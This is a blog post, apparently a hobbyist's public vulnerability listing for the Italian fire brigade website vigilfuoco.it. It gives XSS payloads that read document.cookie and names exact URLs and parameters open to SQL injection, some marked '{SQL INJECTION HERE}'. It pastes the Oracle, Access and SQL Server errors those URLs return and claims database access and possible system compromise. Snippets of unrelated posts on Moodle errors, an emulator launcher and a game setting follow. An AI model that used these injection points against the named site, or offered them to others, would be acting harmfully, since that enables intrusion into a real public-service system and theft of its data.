Skip to main content

http://www.vigilfuoco.it | XSS - SQL Injection

Full of xss and sql injections. Access to 2 dbms. Possible system compromise.  (main language asp)

----------------------------------------------OLD deadlinks/fixed -------------------------------
XSS
http://www.vigilfuoco.it/emailCert/default.asp (form)
"><script>alert(document.cookie);</script><"



http://prevenzioneonline.vigilfuoco.it/VVF/HttpAdapter?CMD=loginDebole&forward=consultazioneMultiplaHandler&codFun=2&action_btn=loginInSessione&nomeServizio=Consultazione%3Cscript%3Ealert(document.cookie);%3C/script%3E


SQL Injections

The first with an oracle error
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?menu=52'

-------------------------------------------------------
OraOLEDB error '80004005'

ORA-01756: stringa tra virgolette terminata in modo irregolare

/includes/menu.asp, line 44
--------------------------------------------------------





This one is related to
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?cboPeriodo=%3Casso4&btnNome1=Vai

-------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id_periodo = <asso4'.

/informazioni/norme_attivita_istituzionali/indice_cronologico.asp, line 72
-------

http://www.vigilfuoco.it/notiziario/archivio.asp (form)
---------
OraOLEDB error '80004005'

ORA-01756: stringa tra virgolette terminata in modo irregolare

/notiziario/archivio.asp, line 378
--------




http://www.vigilfuoco.it/informazioni/uffici_territorio/direzioni.asp?reg=7
----------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Virgoletta di chiusura mancante prima della stringa di caratteri ''.

/informazioni/uffici_territorio/direzioni.asp, line 225
----------------------------
-------------------------------------------------------------------------------------------------------

--------------------------NEW---------------------------------------------
Oracle DB Sql Injection

http://www.vigilfuoco.it/informazioni/uffici_territorio/GestioneSiti/homepageTemplate.asp?s=361{SQL INJECTION HERE}&p=1041

http://www.vigilfuoco.it/sitiVVF/vercelli/notizia.aspx?codnews=12908&s=361{SQL INJECTION HERE}

http://www.vigilfuoco.it/sitiVVF/vercelli/uffici.aspx?s=361{SQL INJECTION HERE}&p=1044{SQL INJECTION HERE}


Labels:

Comments

Post a Comment

Popular posts from this blog

Moodle 3.8.1+ - path leak via errors in several files

Moodle 3.8.1+ ----------------------------------------------- File: admin/mailout-debugger.php #!/usr/bin/php Notice : Disabled. in \admin\mailout-debugger.php on line 73 File: admin/settings/appearance.php Notice : Undefined variable: hassiteconfig in \admin\settings\appearance.php on line 10 Fatal error : Uncaught Error: Call to undefined function has_any_capability() in \admin\settings\appearance.php:10 Stack trace: #0 {main} thrown in \admin\settings\appearance.php on line 10 File: admin/settings/badges.php Notice : Undefined variable: hassiteconfig in \admin\settings\badges.php on line 30 Fatal error : Uncaught Error: Call to undefined function has_any_capability() in \admin\settings\badges.php:30 Stack trace: #0 {main} thrown in \admin\settings\badges.php on line 30 File: admin/settings/courses.php Notice : Undefined variable: hassiteconfig in \admin\settings\courses.php on line 32 Fatal error : Uncaught Error: Call to undefined function
Post a Comment
Read more

2022 - Remove (the too many) Ads from Memu launcher

Simple method Download from pureapk "MEmu Launcher2" ex: MEmu Launcher2_v6.0.9_apkpure.com Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar) Longer method Install "Export Apk" Export the memu launcher2  Install purify https://github.com/echo-devim/purify/raw/master/Purify.apk use purify with the exported memu launcher 2 Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar)      
Post a Comment
Read more

[FIX] cyberpunk skip dialogue disappeared - pc Y button

  open C:\Games\Cyberpunk 2077\r6\config\inputUserMappings.xml with a text editor (ex. notepad++)   find   <mapping name="SceneFastForward_Button" type="Button" > ... </mapping> example (my non working settings)     <mapping name="SceneFastForward_Button" type="Button" >         <button id="IK_Pad_DigitLeft" />         <button id="IK_Y" overridableUI="fastForward" />     </mapping> and REPLACE it with the following:     <mapping name="SceneFastForward_Button" type="Button" >         <button id="IK_Pad_B_CIRCLE" />         <button id="IK_C" overridableUI="fastForward"/>     </mapping> thanks to the vanilla xml files on nexus mods as the original source.
Post a Comment
Read more